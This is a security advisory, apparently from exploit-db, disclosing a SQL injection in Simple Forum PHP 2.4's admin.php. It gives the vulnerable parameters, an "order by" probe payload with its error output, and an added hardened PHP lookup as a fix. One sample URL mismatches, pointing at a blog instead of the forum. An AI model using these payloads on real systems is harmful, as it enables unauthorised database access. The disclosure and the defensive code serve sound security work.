Simple Forum PHP 2.4 – SQL Injection

  • Author: Ehsan Hosseini
    Date: 2016-10-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40531/
  • =====================================================
    # Simple Forum PHP 2.4 - SQL Injection
    =====================================================
    # Vendor Homepage: http://simpleforumphp.com
    # Date: 14 Oct 2016
    # Demo Link : http://simpleforumphp.com/forum/admin.php
    # Version : 2.4
    # Platform : WebApp - PHP
    # Author: Ashiyane Digital Security Team
    # Contact: hehsan979@gmail.com
    =====================================================
    # PoC:
    Vulnerable Url:
    http://localhost/forum/admin.php?act=replies&topic_id=[payload]
    http://localhost/forum/admin.php?act=editTopic&id=[payload]
    Vulnerable parameter : topic_id , id
    Method : GET
    
    A simple injection :
    Payload : '+order+by+100--+
    http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
    
    In the response you can see the result :
    Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE
    id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'
    
    Result of payload: Error: Unknown column '100' in 'order clause'
    =====================================================
    # Discovered By : Ehsan Hosseini
    =====================================================
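
Added example (not part of the original advisory or the vendor's code): a hardened form of the lookup whose query shape appears in the error message above, combining integer validation, a bound parameter and suppressed error output. The function name `fetchTopic`, the in-memory SQLite database and the sample row are assumptions made for the demonstration; only the table and column names come from the advisory.

```php
<?php
// Hardened lookup for: SELECT * FROM demo_forum_topics WHERE id='...'
// (query shape taken from the error output quoted in the advisory).
// fetchTopic() is a hypothetical helper, not the application's own function.

function fetchTopic(PDO $db, $rawId): ?array
{
    // 1. Accept only a positive integer; anything else never reaches SQL.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    try {
        // 2. Bind the value so it is data, never part of the statement text.
        $stmt = $db->prepare('SELECT * FROM demo_forum_topics WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // 3. Keep the driver error in the server log instead of echoing the
        //    query and error text back to the client, as the response above does.
        error_log('topic lookup failed: ' . $e->getMessage());
        return null;
    }
}

// Constructed sample data standing in for the application's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE demo_forum_topics (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO demo_forum_topics (id, title) VALUES (1, 'Welcome')");

// A well-formed id, as the application expects in topic_id / id.
var_dump(fetchTopic($db, '1'));

// The URL-decoded probe string from the advisory; validation rejects it.
var_dump(fetchTopic($db, "' order by 100-- "));
```

The same pattern applies to both parameters the advisory names, `topic_id` and `id`.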